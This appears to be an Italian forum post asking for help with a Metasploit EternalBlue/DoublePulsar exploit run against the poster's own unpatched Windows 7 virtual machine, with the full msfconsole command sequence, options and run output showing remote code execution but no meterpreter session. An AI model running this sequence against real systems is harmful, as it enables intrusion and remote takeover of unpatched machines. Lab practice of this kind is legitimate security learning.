Ciao a tutti,
sto provando questo exploit su macchina virtuale Windows 7 64bit Ultimate non aggiornato con la patch MS17-10 e con antivirus escluso.
Se faccio lo scanner MS17-10 mi restituisce che la macchina è vulnerabile, lanciando l'exploit però non mi crea la sessione meterpreter.
Vi allego tutta la sequenza, grazie per l'eventuale aiuto.
sto provando questo exploit su macchina virtuale Windows 7 64bit Ultimate non aggiornato con la patch MS17-10 e con antivirus escluso.
Se faccio lo scanner MS17-10 mi restituisce che la macchina è vulnerabile, lanciando l'exploit però non mi crea la sessione meterpreter.
Vi allego tutta la sequenza, grazie per l'eventuale aiuto.
Codice:
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(eternalblue_doublepulsar) > set targetarchitecture x64
targetarchitecture => x64
msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.73
RHOST => 192.168.1.73
msf exploit(eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT wlms.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST 192.168.1.73 yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x64 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.1.73 no The target address
Exploit target:
Id Name
-- ----
8 Windows 7 (all services pack) (x86) (x64)
msf exploit(eternalblue_doublepulsar) > run
[*] Started bind handler
[*] 192.168.1.73:445 - Generating Eternalblue XML data
[*] 192.168.1.73:445 - Generating Doublepulsar XML data
[*] 192.168.1.73:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.73:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.73:445 - Launching Eternalblue...
[+] 192.168.1.73:445 - Backdoor is already installed
[*] 192.168.1.73:445 - Launching Doublepulsar...
[+] 192.168.1.73:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) >